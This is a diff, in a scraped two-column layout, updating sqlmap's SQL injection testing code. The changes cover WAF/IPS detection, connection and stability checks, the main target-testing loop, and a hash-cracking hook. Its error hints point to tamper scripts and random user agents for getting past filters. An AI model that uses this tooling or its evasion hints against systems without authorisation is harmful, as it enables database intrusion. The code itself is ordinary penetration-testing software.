singleTimeLogMessage(warnMsg, logging.CRITICAL)
|
singleTimeLogMessage(warnMsg, logging.CRITICAL)
|
||||||
|
|
||||||
|
kb.heavilyDynamic = True
|
||||||
|
|
||||||
secondPage, _, _ = Request.queryPage(content=True)
|
secondPage, _, _ = Request.queryPage(content=True)
|
||||||
findDynamicContent(firstPage, secondPage)
|
findDynamicContent(firstPage, secondPage)
|
||||||
|
|
||||||
@@ -1199,7 +1236,7 @@ def checkStability():
|
|||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
warnMsg = "target URL content is not stable. sqlmap will base the page "
|
warnMsg = "target URL content is not stable (i.e. content differs). sqlmap will base the page "
|
||||||
warnMsg += "comparison on a sequence matcher. If no dynamic nor "
|
warnMsg += "comparison on a sequence matcher. If no dynamic nor "
|
||||||
warnMsg += "injectable parameters are detected, or in case of "
|
warnMsg += "injectable parameters are detected, or in case of "
|
||||||
warnMsg += "junk results, refer to user's manual paragraph "
|
warnMsg += "junk results, refer to user's manual paragraph "
|
||||||
@@ -1284,14 +1321,14 @@ def checkRegexp():
|
|||||||
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
|
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
|
||||||
|
|
||||||
if not re.search(conf.regexp, rawResponse, re.I | re.M):
|
if not re.search(conf.regexp, rawResponse, re.I | re.M):
|
||||||
warnMsg = "you provided '%s' as the regular expression to " % conf.regexp
|
warnMsg = "you provided '%s' as the regular expression " % conf.regexp
|
||||||
warnMsg += "match, but such a regular expression does not have any "
|
warnMsg += "which does not have any match within the target URL raw response. sqlmap "
|
||||||
warnMsg += "match within the target URL raw response, sqlmap "
|
|
||||||
warnMsg += "will carry on anyway"
|
warnMsg += "will carry on anyway"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkWaf():
|
def checkWaf():
|
||||||
"""
|
"""
|
||||||
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
|
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
|
||||||
@@ -1304,7 +1341,7 @@ def checkWaf():
|
|||||||
if _ is not None:
|
if _ is not None:
|
||||||
if _:
|
if _:
|
||||||
warnMsg = "previous heuristics detected that the target "
|
warnMsg = "previous heuristics detected that the target "
|
||||||
warnMsg += "is protected by some kind of WAF/IPS/IDS"
|
warnMsg += "is protected by some kind of WAF/IPS"
|
||||||
logger.critical(warnMsg)
|
logger.critical(warnMsg)
|
||||||
return _
|
return _
|
||||||
|
|
||||||
@@ -1312,34 +1349,47 @@ def checkWaf():
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
infoMsg = "checking if the target is protected by "
|
infoMsg = "checking if the target is protected by "
|
||||||
infoMsg += "some kind of WAF/IPS/IDS"
|
infoMsg += "some kind of WAF/IPS"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
retVal = False
|
retVal = False
|
||||||
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
|
payload = "%d %s" % (randomInt(), IPS_WAF_CHECK_PAYLOAD)
|
||||||
|
|
||||||
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
|
if PLACE.URI in conf.parameters:
|
||||||
value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
|
place = PLACE.POST
|
||||||
|
value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
|
||||||
|
else:
|
||||||
|
place = PLACE.GET
|
||||||
|
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
|
||||||
|
value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
|
||||||
|
|
||||||
|
pushValue(kb.redirectChoice)
|
||||||
|
pushValue(kb.resendPostOnRedirect)
|
||||||
pushValue(conf.timeout)
|
pushValue(conf.timeout)
|
||||||
|
|
||||||
|
kb.redirectChoice = REDIRECTION.YES
|
||||||
|
kb.resendPostOnRedirect = False
|
||||||
conf.timeout = IDS_WAF_CHECK_TIMEOUT
|
conf.timeout = IDS_WAF_CHECK_TIMEOUT
|
||||||
|
|
||||||
try:
|
try:
|
||||||
retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
|
retVal = Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, disableTampering=True)[1] < IDS_WAF_CHECK_RATIO
|
||||||
except SqlmapConnectionException:
|
except SqlmapConnectionException:
|
||||||
retVal = True
|
retVal = True
|
||||||
finally:
|
finally:
|
||||||
kb.matchRatio = None
|
kb.matchRatio = None
|
||||||
|
|
||||||
conf.timeout = popValue()
|
conf.timeout = popValue()
|
||||||
|
kb.resendPostOnRedirect = popValue()
|
||||||
|
kb.redirectChoice = popValue()
|
||||||
|
|
||||||
if retVal:
|
if retVal:
|
||||||
warnMsg = "heuristics detected that the target "
|
warnMsg = "heuristics detected that the target "
|
||||||
warnMsg += "is protected by some kind of WAF/IPS/IDS"
|
warnMsg += "is protected by some kind of WAF/IPS"
|
||||||
logger.critical(warnMsg)
|
logger.critical(warnMsg)
|
||||||
|
|
||||||
if not conf.identifyWaf:
|
if not conf.identifyWaf:
|
||||||
message = "do you want sqlmap to try to detect backend "
|
message = "do you want sqlmap to try to detect backend "
|
||||||
message += "WAF/IPS/IDS? [y/N] "
|
message += "WAF/IPS? [y/N] "
|
||||||
|
|
||||||
if readInput(message, default='N', boolean=True):
|
if readInput(message, default='N', boolean=True):
|
||||||
conf.identifyWaf = True
|
conf.identifyWaf = True
|
||||||
@@ -1352,6 +1402,7 @@ def checkWaf():
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def identifyWaf():
|
def identifyWaf():
|
||||||
if not conf.identifyWaf:
|
if not conf.identifyWaf:
|
||||||
return None
|
return None
|
||||||
@@ -1362,7 +1413,7 @@ def identifyWaf():
|
|||||||
kb.testMode = True
|
kb.testMode = True
|
||||||
|
|
||||||
infoMsg = "using WAF scripts to detect "
|
infoMsg = "using WAF scripts to detect "
|
||||||
infoMsg += "backend WAF/IPS/IDS protection"
|
infoMsg += "backend WAF/IPS protection"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
@cachedmethod
|
@cachedmethod
|
||||||
@@ -1370,11 +1421,12 @@ def identifyWaf():
|
|||||||
page, headers, code = None, None, None
|
page, headers, code = None, None, None
|
||||||
try:
|
try:
|
||||||
pushValue(kb.redirectChoice)
|
pushValue(kb.redirectChoice)
|
||||||
kb.redirectChoice = REDIRECTION.NO
|
kb.redirectChoice = REDIRECTION.YES
|
||||||
if kwargs.get("get"):
|
if kwargs.get("get"):
|
||||||
kwargs["get"] = urlencode(kwargs["get"])
|
kwargs["get"] = urlencode(kwargs["get"])
|
||||||
kwargs["raise404"] = False
|
kwargs["raise404"] = False
|
||||||
kwargs["silent"] = True
|
kwargs["silent"] = True
|
||||||
|
kwargs["finalCode"] = True
|
||||||
page, headers, code = Request.getPage(*args, **kwargs)
|
page, headers, code = Request.getPage(*args, **kwargs)
|
||||||
except Exception:
|
except Exception:
|
||||||
pass
|
pass
|
||||||
@@ -1389,9 +1441,9 @@ def identifyWaf():
|
|||||||
continue
|
continue
|
||||||
|
|
||||||
try:
|
try:
|
||||||
logger.debug("checking for WAF/IPS/IDS product '%s'" % product)
|
logger.debug("checking for WAF/IPS product '%s'" % product)
|
||||||
found = function(_)
|
found = function(_)
|
||||||
except Exception, ex:
|
except Exception as ex:
|
||||||
errMsg = "exception occurred while running "
|
errMsg = "exception occurred while running "
|
||||||
errMsg += "WAF script for '%s' ('%s')" % (product, getSafeExString(ex))
|
errMsg += "WAF script for '%s' ('%s')" % (product, getSafeExString(ex))
|
||||||
logger.critical(errMsg)
|
logger.critical(errMsg)
|
||||||
@@ -1399,19 +1451,19 @@ def identifyWaf():
|
|||||||
found = False
|
found = False
|
||||||
|
|
||||||
if found:
|
if found:
|
||||||
errMsg = "WAF/IPS/IDS identified as '%s'" % product
|
errMsg = "WAF/IPS identified as '%s'" % product
|
||||||
logger.critical(errMsg)
|
logger.critical(errMsg)
|
||||||
|
|
||||||
retVal.append(product)
|
retVal.append(product)
|
||||||
|
|
||||||
if retVal:
|
if retVal:
|
||||||
if kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
|
if kb.wafSpecificResponse and "You don't have permission to access" not in kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
|
||||||
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE)
|
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE)
|
||||||
os.close(handle)
|
os.close(handle)
|
||||||
with openFile(filename, "w+b") as f:
|
with openFile(filename, "w+b") as f:
|
||||||
f.write(kb.wafSpecificResponse)
|
f.write(kb.wafSpecificResponse)
|
||||||
|
|
||||||
message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename
|
message = "WAF/IPS specific response can be found in '%s'. " % filename
|
||||||
message += "If you know the details on used protection please "
|
message += "If you know the details on used protection please "
|
||||||
message += "report it along with specific response "
|
message += "report it along with specific response "
|
||||||
message += "to '%s'" % DEV_EMAIL_ADDRESS
|
message += "to '%s'" % DEV_EMAIL_ADDRESS
|
||||||
@@ -1428,7 +1480,7 @@ def identifyWaf():
|
|||||||
if not choice:
|
if not choice:
|
||||||
raise SqlmapUserQuitException
|
raise SqlmapUserQuitException
|
||||||
else:
|
else:
|
||||||
warnMsg = "WAF/IPS/IDS product hasn't been identified"
|
warnMsg = "WAF/IPS product hasn't been identified"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
kb.testType = None
|
kb.testType = None
|
||||||
@@ -1436,6 +1488,7 @@ def identifyWaf():
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkNullConnection():
|
def checkNullConnection():
|
||||||
"""
|
"""
|
||||||
Reference: http://www.wisec.it/sectou.php?id=472f952d79293
|
Reference: http://www.wisec.it/sectou.php?id=472f952d79293
|
||||||
@@ -1447,11 +1500,11 @@ def checkNullConnection():
|
|||||||
infoMsg = "testing NULL connection to the target URL"
|
infoMsg = "testing NULL connection to the target URL"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
try:
|
pushValue(kb.pageCompress)
|
||||||
pushValue(kb.pageCompress)
|
kb.pageCompress = False
|
||||||
kb.pageCompress = False
|
|
||||||
|
|
||||||
page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
|
try:
|
||||||
|
page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD, raise404=False)
|
||||||
|
|
||||||
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
|
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
|
||||||
kb.nullConnection = NULLCONNECTION.HEAD
|
kb.nullConnection = NULLCONNECTION.HEAD
|
||||||
@@ -1475,9 +1528,8 @@ def checkNullConnection():
|
|||||||
infoMsg = "NULL connection is supported with 'skip-read' method"
|
infoMsg = "NULL connection is supported with 'skip-read' method"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
except SqlmapConnectionException, ex:
|
except SqlmapConnectionException:
|
||||||
errMsg = getSafeExString(ex)
|
pass
|
||||||
raise SqlmapConnectionException(errMsg)
|
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
kb.pageCompress = popValue()
|
kb.pageCompress = popValue()
|
||||||
@@ -1485,18 +1537,23 @@ def checkNullConnection():
|
|||||||
return kb.nullConnection is not None
|
return kb.nullConnection is not None
|
||||||
|
|
||||||
def checkConnection(suppressOutput=False):
|
def checkConnection(suppressOutput=False):
|
||||||
if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
|
if not re.search(r"\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z", conf.hostname):
|
||||||
try:
|
if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
|
||||||
debugMsg = "resolving hostname '%s'" % conf.hostname
|
try:
|
||||||
logger.debug(debugMsg)
|
debugMsg = "resolving hostname '%s'" % conf.hostname
|
||||||
socket.getaddrinfo(conf.hostname, None)
|
logger.debug(debugMsg)
|
||||||
except socket.gaierror:
|
socket.getaddrinfo(conf.hostname, None)
|
||||||
errMsg = "host '%s' does not exist" % conf.hostname
|
except socket.gaierror:
|
||||||
raise SqlmapConnectionException(errMsg)
|
errMsg = "host '%s' does not exist" % conf.hostname
|
||||||
except socket.error, ex:
|
raise SqlmapConnectionException(errMsg)
|
||||||
errMsg = "problem occurred while "
|
except socket.error as ex:
|
||||||
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
|
errMsg = "problem occurred while "
|
||||||
raise SqlmapConnectionException(errMsg)
|
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
|
||||||
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
except UnicodeError as ex:
|
||||||
|
errMsg = "problem occurred while "
|
||||||
|
errMsg += "handling a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
|
||||||
|
raise SqlmapDataException(errMsg)
|
||||||
|
|
||||||
if not suppressOutput and not conf.dummy and not conf.offline:
|
if not suppressOutput and not conf.dummy and not conf.offline:
|
||||||
infoMsg = "testing connection to the target URL"
|
infoMsg = "testing connection to the target URL"
|
||||||
@@ -1509,6 +1566,10 @@ def checkConnection(suppressOutput=False):
|
|||||||
|
|
||||||
kb.errorIsNone = False
|
kb.errorIsNone = False
|
||||||
|
|
||||||
|
if any(_ in (kb.serverHeader or "") for _ in PRECONNECT_INCOMPATIBLE_SERVERS):
|
||||||
|
singleTimeWarnMessage("turning off pre-connect mechanism because of incompatible server ('%s')" % kb.serverHeader)
|
||||||
|
conf.disablePrecon = True
|
||||||
|
|
||||||
if not kb.originalPage and wasLastResponseHTTPError():
|
if not kb.originalPage and wasLastResponseHTTPError():
|
||||||
errMsg = "unable to retrieve page content"
|
errMsg = "unable to retrieve page content"
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
@@ -1524,7 +1585,16 @@ def checkConnection(suppressOutput=False):
|
|||||||
else:
|
else:
|
||||||
kb.errorIsNone = True
|
kb.errorIsNone = True
|
||||||
|
|
||||||
except SqlmapConnectionException, ex:
|
threadData = getCurrentThreadData()
|
||||||
|
|
||||||
|
if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:
|
||||||
|
if (threadData.lastRedirectURL[1] or "").startswith("https://") and unicodeencode(conf.hostname) in threadData.lastRedirectURL[1]:
|
||||||
|
conf.url = re.sub(r"https?://", "https://", conf.url)
|
||||||
|
match = re.search(r":(\d+)", threadData.lastRedirectURL[1])
|
||||||
|
port = match.group(1) if match else 443
|
||||||
|
conf.url = re.sub(r":\d+(/|\Z)", ":%s\g<1>" % port, conf.url)
|
||||||
|
|
||||||
|
except SqlmapConnectionException as ex:
|
||||||
if conf.ipv6:
|
if conf.ipv6:
|
||||||
warnMsg = "check connection to a provided "
|
warnMsg = "check connection to a provided "
|
||||||
warnMsg += "IPv6 address with a tool like ping6 "
|
warnMsg += "IPv6 address with a tool like ping6 "
|
||||||
@@ -1554,8 +1624,8 @@ def checkInternet():
|
|||||||
content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]
|
content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]
|
||||||
return CHECK_INTERNET_VALUE in (content or "")
|
return CHECK_INTERNET_VALUE in (content or "")
|
||||||
|
|
||||||
def setVerbosity(): # Cross-linked function
|
def setVerbosity(): # Cross-referenced function
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
|
|
||||||
def setWafFunctions(): # Cross-linked function
|
def setWafFunctions(): # Cross-referenced function
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -43,6 +43,7 @@ from lib.core.common import urldecode
|
|||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.decorators import stackedmethod
|
||||||
from lib.core.enums import CONTENT_TYPE
|
from lib.core.enums import CONTENT_TYPE
|
||||||
from lib.core.enums import HASHDB_KEYS
|
from lib.core.enums import HASHDB_KEYS
|
||||||
from lib.core.enums import HEURISTIC_TEST
|
from lib.core.enums import HEURISTIC_TEST
|
||||||
@@ -55,9 +56,11 @@ from lib.core.exception import SqlmapNoneDataException
|
|||||||
from lib.core.exception import SqlmapNotVulnerableException
|
from lib.core.exception import SqlmapNotVulnerableException
|
||||||
from lib.core.exception import SqlmapSilentQuitException
|
from lib.core.exception import SqlmapSilentQuitException
|
||||||
from lib.core.exception import SqlmapSkipTargetException
|
from lib.core.exception import SqlmapSkipTargetException
|
||||||
|
from lib.core.exception import SqlmapSystemException
|
||||||
from lib.core.exception import SqlmapValueException
|
from lib.core.exception import SqlmapValueException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.settings import ASP_NET_CONTROL_REGEX
|
from lib.core.settings import ASP_NET_CONTROL_REGEX
|
||||||
|
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
|
||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
|
from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
|
||||||
from lib.core.settings import IGNORE_PARAMETERS
|
from lib.core.settings import IGNORE_PARAMETERS
|
||||||
@@ -68,6 +71,7 @@ from lib.core.settings import REFERER_ALIASES
|
|||||||
from lib.core.settings import USER_AGENT_ALIASES
|
from lib.core.settings import USER_AGENT_ALIASES
|
||||||
from lib.core.target import initTargetEnv
|
from lib.core.target import initTargetEnv
|
||||||
from lib.core.target import setupTargetEnv
|
from lib.core.target import setupTargetEnv
|
||||||
|
from lib.utils.hash import crackHashFile
|
||||||
|
|
||||||
def _selectInjection():
|
def _selectInjection():
|
||||||
"""
|
"""
|
||||||
@@ -86,7 +90,7 @@ def _selectInjection():
|
|||||||
if point not in points:
|
if point not in points:
|
||||||
points[point] = injection
|
points[point] = injection
|
||||||
else:
|
else:
|
||||||
for key in points[point].keys():
|
for key in points[point]:
|
||||||
if key != 'data':
|
if key != 'data':
|
||||||
points[point][key] = points[point][key] or injection[key]
|
points[point][key] = points[point][key] or injection[key]
|
||||||
points[point]['data'].update(injection['data'])
|
points[point]['data'].update(injection['data'])
|
||||||
@@ -152,12 +156,15 @@ def _formatInjection(inj):
|
|||||||
vector = "%s%s" % (vector, comment)
|
vector = "%s%s" % (vector, comment)
|
||||||
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
|
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
|
||||||
data += " Title: %s\n" % title
|
data += " Title: %s\n" % title
|
||||||
data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
|
data += " Payload: %s\n" % urldecode(payload, unsafe="&", spaceplus=(inj.place != PLACE.GET and kb.postSpaceToPlus))
|
||||||
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
|
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
|
||||||
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
def _showInjections():
|
def _showInjections():
|
||||||
|
if conf.wizard and kb.wizardMode:
|
||||||
|
kb.wizardMode = False
|
||||||
|
|
||||||
if kb.testQueryCount > 0:
|
if kb.testQueryCount > 0:
|
||||||
header = "sqlmap identified the following injection point(s) with "
|
header = "sqlmap identified the following injection point(s) with "
|
||||||
header += "a total of %d HTTP(s) requests" % kb.testQueryCount
|
header += "a total of %d HTTP(s) requests" % kb.testQueryCount
|
||||||
@@ -237,19 +244,24 @@ def _saveToResultsFile():
|
|||||||
if key not in results:
|
if key not in results:
|
||||||
results[key] = []
|
results[key] = []
|
||||||
|
|
||||||
results[key].extend(injection.data.keys())
|
results[key].extend(list(injection.data.keys()))
|
||||||
|
|
||||||
for key, value in results.items():
|
try:
|
||||||
place, parameter, notes = key
|
for key, value in results.items():
|
||||||
line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep)
|
place, parameter, notes = key
|
||||||
conf.resultsFP.write(line)
|
line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep)
|
||||||
|
conf.resultsFP.write(line)
|
||||||
|
|
||||||
if not results:
|
if not results:
|
||||||
line = "%s,,,,%s" % (conf.url, os.linesep)
|
line = "%s,,,,%s" % (conf.url, os.linesep)
|
||||||
conf.resultsFP.write(line)
|
conf.resultsFP.write(line)
|
||||||
|
|
||||||
conf.resultsFP.flush()
|
conf.resultsFP.flush()
|
||||||
|
except IOError as ex:
|
||||||
|
errMsg = "unable to write to the results file '%s' ('%s'). " % (conf.resultsFilename, getSafeExString(ex))
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def start():
|
def start():
|
||||||
"""
|
"""
|
||||||
This function calls a function that performs checks on both URL
|
This function calls a function that performs checks on both URL
|
||||||
@@ -257,6 +269,9 @@ def start():
|
|||||||
check if they are dynamic and SQL injection affected
|
check if they are dynamic and SQL injection affected
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
if conf.hashFile:
|
||||||
|
crackHashFile(conf.hashFile)
|
||||||
|
|
||||||
if conf.direct:
|
if conf.direct:
|
||||||
initTargetEnv()
|
initTargetEnv()
|
||||||
setupTargetEnv()
|
setupTargetEnv()
|
||||||
@@ -283,7 +298,7 @@ def start():
|
|||||||
try:
|
try:
|
||||||
|
|
||||||
if conf.checkInternet:
|
if conf.checkInternet:
|
||||||
infoMsg = "[INFO] checking for Internet connection"
|
infoMsg = "checking for Internet connection"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
if not checkInternet():
|
if not checkInternet():
|
||||||
@@ -302,6 +317,7 @@ def start():
|
|||||||
conf.cookie = targetCookie
|
conf.cookie = targetCookie
|
||||||
conf.httpHeaders = list(initialHeaders)
|
conf.httpHeaders = list(initialHeaders)
|
||||||
conf.httpHeaders.extend(targetHeaders or [])
|
conf.httpHeaders.extend(targetHeaders or [])
|
||||||
|
conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])]
|
||||||
|
|
||||||
initTargetEnv()
|
initTargetEnv()
|
||||||
parseTargetUrl()
|
parseTargetUrl()
|
||||||
@@ -368,9 +384,8 @@ def start():
|
|||||||
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
||||||
|
|
||||||
else:
|
else:
|
||||||
if targetUrl.find("?") > -1:
|
if '?' in targetUrl:
|
||||||
firstPart = targetUrl[:targetUrl.find("?")]
|
firstPart, secondPart = targetUrl.split('?', 1)
|
||||||
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
|
||||||
message = "Edit GET data [default: %s]: " % secondPart
|
message = "Edit GET data [default: %s]: " % secondPart
|
||||||
test = readInput(message, default=secondPart)
|
test = readInput(message, default=secondPart)
|
||||||
test = _randomFillBlankFields(test)
|
test = _randomFillBlankFields(test)
|
||||||
@@ -404,8 +419,7 @@ def start():
|
|||||||
if conf.nullConnection:
|
if conf.nullConnection:
|
||||||
checkNullConnection()
|
checkNullConnection()
|
||||||
|
|
||||||
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
|
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
|
||||||
and (kb.injection.place is None or kb.injection.parameter is None):
|
|
||||||
|
|
||||||
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
||||||
# NOTE: this is not needed anymore, leaving only to display
|
# NOTE: this is not needed anymore, leaving only to display
|
||||||
@@ -413,7 +427,7 @@ def start():
|
|||||||
checkStability()
|
checkStability()
|
||||||
|
|
||||||
# Do a little prioritization reorder of a testable parameter list
|
# Do a little prioritization reorder of a testable parameter list
|
||||||
parameters = conf.parameters.keys()
|
parameters = list(conf.parameters.keys())
|
||||||
|
|
||||||
# Order of testing list (first to last)
|
# Order of testing list (first to last)
|
||||||
orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET)
|
orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET)
|
||||||
@@ -495,14 +509,14 @@ def start():
|
|||||||
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
elif parameter == conf.csrfToken:
|
elif conf.csrfToken and re.search(conf.csrfToken, parameter, re.I):
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
|
infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
# Ignore session-like parameters for --level < 4
|
# Ignore session-like parameters for --level < 4
|
||||||
elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
|
elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
|
infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
|
||||||
@@ -521,7 +535,7 @@ def start():
|
|||||||
|
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
else:
|
else:
|
||||||
infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
|
infoMsg = "%s parameter '%s' appears to be dynamic" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
kb.testedParams.add(paramKey)
|
kb.testedParams.add(paramKey)
|
||||||
@@ -628,6 +642,9 @@ def start():
|
|||||||
errMsg += "involved (e.g. WAF) maybe you could try to use "
|
errMsg += "involved (e.g. WAF) maybe you could try to use "
|
||||||
errMsg += "option '--tamper' (e.g. '--tamper=space2comment')"
|
errMsg += "option '--tamper' (e.g. '--tamper=space2comment')"
|
||||||
|
|
||||||
|
if not conf.randomAgent:
|
||||||
|
errMsg += " and/or switch '--random-agent'"
|
||||||
|
|
||||||
raise SqlmapNotVulnerableException(errMsg.rstrip('.'))
|
raise SqlmapNotVulnerableException(errMsg.rstrip('.'))
|
||||||
else:
|
else:
|
||||||
# Flush the flag
|
# Flush the flag
|
||||||
@@ -672,7 +689,7 @@ def start():
|
|||||||
except SqlmapSilentQuitException:
|
except SqlmapSilentQuitException:
|
||||||
raise
|
raise
|
||||||
|
|
||||||
except SqlmapBaseException, ex:
|
except SqlmapBaseException as ex:
|
||||||
errMsg = getSafeExString(ex)
|
errMsg = getSafeExString(ex)
|
||||||
|
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -10,6 +10,7 @@ from lib.core.data import conf
|
